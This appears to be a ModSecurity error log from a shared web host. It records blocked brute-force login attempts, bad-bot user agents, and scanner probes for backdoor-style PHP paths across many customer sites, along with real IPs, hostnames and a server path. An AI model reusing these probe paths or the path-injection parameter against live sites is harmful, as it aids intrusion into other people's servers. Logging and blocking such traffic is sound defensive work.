[Tue May 26 13:40:03.415816 2026] [security2:error] [pid 544395:tid 544576] [client 106.192.248.115:63023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVWxmrs7g3RMCdp8XMkAAAADM"]
[Tue May 26 13:40:03.420343 2026] [security2:error] [pid 544395:tid 544576] [client 106.192.248.115:63023] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVWxmrs7g3RMCdp8XMkAAAADM"]
[Tue May 26 13:40:03.849030 2026] [security2:error] [pid 536875:tid 537069] [client 129.222.147.134:5716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVW-r_-FTveSGlx1Hs_wAAAMU"]
[Tue May 26 13:40:03.849160 2026] [security2:error] [pid 536875:tid 537069] [client 129.222.147.134:5716] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVW-r_-FTveSGlx1Hs_wAAAMU"]
[Tue May 26 13:40:04.780065 2026] [security2:error] [pid 536875:tid 537127] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVXOr_-FTveSGlx1HtCgAAAP8"]
[Tue May 26 13:40:05.013141 2026] [security2:error] [pid 536875:tid 537093] [client 103.99.216.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVXOr_-FTveSGlx1HtDgAAAN0"]
[Tue May 26 13:40:06.259539 2026] [security2:error] [pid 544395:tid 544452] [remote 95.216.117.13:52734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVVXhmrs7g3RMCdp8XM2QAAMjg"]
[Tue May 26 13:40:07.361196 2026] [security2:error] [pid 544395:tid 544544] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVXhmrs7g3RMCdp8XM4AAAABM"]
[Tue May 26 13:40:09.178004 2026] [security2:error] [pid 544395:tid 544598] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVYBmrs7g3RMCdp8XM8wAAAEk"]
[Tue May 26 13:40:09.193362 2026] [security2:error] [pid 544395:tid 544531] [client 80.76.42.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVVYRmrs7g3RMCdp8XM_QAAAAY"], referer: https://www.anujtradingco.com/
[Tue May 26 13:40:10.670214 2026] [security2:error] [pid 544395:tid 544597] [client 80.76.42.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVVYhmrs7g3RMCdp8XNGwAAAEg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 13:40:11.318940 2026] [security2:error] [pid 536875:tid 537047] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVYur_-FTveSGlx1HtXAAAAK8"]
[Tue May 26 13:40:12.689634 2026] [security2:error] [pid 536875:tid 536903] [remote 121.200.216.55:58080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVVZOr_-FTveSGlx1HtbgAAqxs"]
[Tue May 26 13:40:13.514889 2026] [security2:error] [pid 536875:tid 537115] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVZer_-FTveSGlx1HteAAAAPM"]
[Tue May 26 13:40:14.028800 2026] [security2:error] [pid 536875:tid 537069] [client 129.222.147.134:11255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVZur_-FTveSGlx1HtgwAAAMU"]
[Tue May 26 13:40:14.032265 2026] [security2:error] [pid 536875:tid 537069] [client 129.222.147.134:11255] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVZur_-FTveSGlx1HtgwAAAMU"]
[Tue May 26 13:40:14.630947 2026] [security2:error] [pid 536875:tid 537031] [client 106.192.248.115:63336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVZur_-FTveSGlx1HtigAAAJ8"]
[Tue May 26 13:40:14.631067 2026] [security2:error] [pid 536875:tid 537031] [client 106.192.248.115:63336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVZur_-FTveSGlx1HtigAAAJ8"]
[Tue May 26 13:40:15.214897 2026] [security2:error] [pid 544395:tid 544462] [remote 58.251.94.5:41076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.94.251.58.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVVZxmrs7g3RMCdp8XNXAAAEUI"]
[Tue May 26 13:40:15.251499 2026] [security2:error] [pid 544395:tid 544550] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVZhmrs7g3RMCdp8XNVwAAABk"]
[Tue May 26 13:40:15.609331 2026] [fcgid:warn] [pid 544395:tid 544576] (70014)End of file found: [client 66.132.186.197:51070] mod_fcgid: can't get data from http client
[Tue May 26 13:40:15.818832 2026] [security2:error] [pid 536875:tid 537046] [client 20.104.227.76:23954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "platformtaksi.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVVZ-r_-FTveSGlx1HtmQAAAK4"]
[Tue May 26 13:40:17.014867 2026] [security2:error] [pid 544395:tid 544650] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVaBmrs7g3RMCdp8XNdAAAAH0"]
[Tue May 26 13:40:19.064295 2026] [security2:error] [pid 544395:tid 544637] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVahmrs7g3RMCdp8XNlgAAAHA"]
[Tue May 26 13:40:20.646282 2026] [security2:error] [pid 544395:tid 544532] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVbBmrs7g3RMCdp8XNsgAAAAc"]
[Tue May 26 13:40:23.130398 2026] [security2:error] [pid 536875:tid 537076] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVbur_-FTveSGlx1Ht7gAAAMw"]
[Tue May 26 13:40:24.032007 2026] [security2:error] [pid 536875:tid 537017] [client 114.119.132.135:31047] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/2/"] [unique_id "ahVVcOr_-FTveSGlx1HuAgAAAJE"], referer: https://theafterglow-centre.com/events/list/page/2/?tribe-bar-date=2024-01-13
[Tue May 26 13:40:24.484400 2026] [security2:error] [pid 536875:tid 537009] [client 129.222.147.134:21387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVcOr_-FTveSGlx1HuBQAAAIk"]
[Tue May 26 13:40:24.484563 2026] [security2:error] [pid 536875:tid 537009] [client 129.222.147.134:21387] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVcOr_-FTveSGlx1HuBQAAAIk"]
[Tue May 26 13:40:24.598573 2026] [security2:error] [pid 536875:tid 537006] [client 106.192.248.115:63651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVcOr_-FTveSGlx1HuBwAAAIY"]
[Tue May 26 13:40:24.598771 2026] [security2:error] [pid 536875:tid 537006] [client 106.192.248.115:63651] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVcOr_-FTveSGlx1HuBwAAAIY"]
[Tue May 26 13:40:24.955136 2026] [security2:error] [pid 544395:tid 544525] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVcBmrs7g3RMCdp8XN8gAAAAA"]
[Tue May 26 13:40:26.413890 2026] [security2:error] [pid 544395:tid 544572] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVcRmrs7g3RMCdp8XOCAAAAC8"]
[Tue May 26 13:40:27.833972 2026] [security2:error] [pid 544395:tid 544576] [client 117.99.83.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVcxmrs7g3RMCdp8XOHgAAADM"]
[Tue May 26 13:40:28.830610 2026] [security2:error] [pid 544395:tid 544611] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVdBmrs7g3RMCdp8XOMgAAAFY"]
[Tue May 26 13:40:29.712198 2026] [security2:error] [pid 536875:tid 537098] [client 2.58.56.61:63694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVVder_-FTveSGlx1HuNAAAAOI"], referer: www.google.com
[Tue May 26 13:40:29.725141 2026] [security2:error] [pid 536875:tid 537053] [client 2.58.56.61:63691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVVder_-FTveSGlx1HuNwAAALU"]
[Tue May 26 13:40:29.757326 2026] [security2:error] [pid 536875:tid 537043] [client 2.58.56.61:63692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-plain.php"] [unique_id "ahVVder_-FTveSGlx1HuOAAAAKs"], referer: www.google.com
[Tue May 26 13:40:30.055744 2026] [security2:error] [pid 536875:tid 537096] [client 2.58.56.61:63991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/exglqvqp.php"] [unique_id "ahVVdur_-FTveSGlx1HuQQAAAOA"], referer: www.google.com
[Tue May 26 13:40:30.163493 2026] [security2:error] [pid 536875:tid 537009] [client 2.58.56.61:63965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVVdur_-FTveSGlx1HuRAAAAIk"], referer: www.google.com
[Tue May 26 13:40:30.496823 2026] [security2:error] [pid 536875:tid 537074] [client 2.58.56.61:64185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-plain.php"] [unique_id "ahVVdur_-FTveSGlx1HuSgAAAMo"], referer: www.google.com
[Tue May 26 13:40:30.812833 2026] [security2:error] [pid 536875:tid 537082] [client 2.58.56.61:63693] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVVder_-FTveSGlx1HuNQAAANI"], referer: www.google.com
[Tue May 26 13:40:30.891474 2026] [security2:error] [pid 544395:tid 544640] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVdhmrs7g3RMCdp8XOTwAAAHM"]
[Tue May 26 13:40:30.934418 2026] [security2:error] [pid 536875:tid 537037] [client 2.58.56.61:64454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/tzvhuolm.php"] [unique_id "ahVVdur_-FTveSGlx1HuUwAAAKU"], referer: www.google.com
[Tue May 26 13:40:31.358400 2026] [security2:error] [pid 536875:tid 537014] [client 2.58.56.61:63693] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVVd-r_-FTveSGlx1HuWgAAAI4"], referer: www.google.com
[Tue May 26 13:40:31.471666 2026] [security2:error] [pid 536875:tid 537118] [client 2.58.56.61:64443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVVd-r_-FTveSGlx1HuWwAAAPY"]
[Tue May 26 13:40:31.909703 2026] [security2:error] [pid 536875:tid 537062] [client 2.58.56.61:64907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVVd-r_-FTveSGlx1HuZQAAAL4"]
[Tue May 26 13:40:32.342783 2026] [security2:error] [pid 544395:tid 544602] [client 2.58.56.61:65152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVVeBmrs7g3RMCdp8XOYgAAAE0"]
[Tue May 26 13:40:32.779649 2026] [security2:error] [pid 536875:tid 537087] [client 2.58.56.61:65330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVVeOr_-FTveSGlx1HudAAAANc"]
[Tue May 26 13:40:32.831174 2026] [security2:error] [pid 544395:tid 544573] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVeBmrs7g3RMCdp8XOaQAAADA"]
[Tue May 26 13:40:32.940288 2026] [security2:error] [pid 536875:tid 536991] [remote 74.7.241.58:42180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVVeOr_-FTveSGlx1HudQAAnHM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 13:40:34.177828 2026] [security2:error] [pid 536875:tid 536997] [remote 206.189.187.127:52594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVVeer_-FTveSGlx1HufgAAxXk"]
[Tue May 26 13:40:34.681776 2026] [security2:error] [pid 536875:tid 537084] [client 129.222.147.134:35568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVeur_-FTveSGlx1HujgAAANQ"]
[Tue May 26 13:40:34.681899 2026] [security2:error] [pid 536875:tid 537084] [client 129.222.147.134:35568] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVeur_-FTveSGlx1HujgAAANQ"]
[Tue May 26 13:40:34.860734 2026] [security2:error] [pid 536875:tid 537080] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVeur_-FTveSGlx1HuiAAAANA"]
[Tue May 26 13:40:34.872268 2026] [security2:error] [pid 544395:tid 544536] [client 185.191.171.11:29450] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-2-6/list/"] [unique_id "ahVVehmrs7g3RMCdp8XOiQAAAAs"]
[Tue May 26 13:40:34.872421 2026] [security2:error] [pid 544395:tid 544536] [client 185.191.171.11:29450] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-2-6/list/"] [unique_id "ahVVehmrs7g3RMCdp8XOiQAAAAs"]
[Tue May 26 13:40:34.931985 2026] [security2:error] [pid 536875:tid 537067] [client 122.54.88.152:42699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 152.88.54.122.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "krishnawoodworks.com"] [uri "/xmlrpc.php"] [unique_id "ahVVeur_-FTveSGlx1HujwAAAMM"]
[Tue May 26 13:40:34.932153 2026] [security2:error] [pid 536875:tid 537067] [client 122.54.88.152:42699] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "krishnawoodworks.com"] [uri "/xmlrpc.php"] [unique_id "ahVVeur_-FTveSGlx1HujwAAAMM"]
[Tue May 26 13:40:35.008054 2026] [security2:error] [pid 536875:tid 537032] [client 106.192.248.115:63958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVe-r_-FTveSGlx1HulgAAAKA"]
[Tue May 26 13:40:35.008149 2026] [security2:error] [pid 536875:tid 537032] [client 106.192.248.115:63958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVe-r_-FTveSGlx1HulgAAAKA"]
[Tue May 26 13:40:36.852737 2026] [security2:error] [pid 544395:tid 544595] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVfBmrs7g3RMCdp8XOngAAAEY"]
[Tue May 26 13:40:37.735578 2026] [security2:error] [pid 536875:tid 537092] [client 107.189.16.223:55174] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "landsonlogistics.com"] [uri "/Search-Replace-DB-master/"] [unique_id "ahVVfer_-FTveSGlx1HuwAAAANw"]
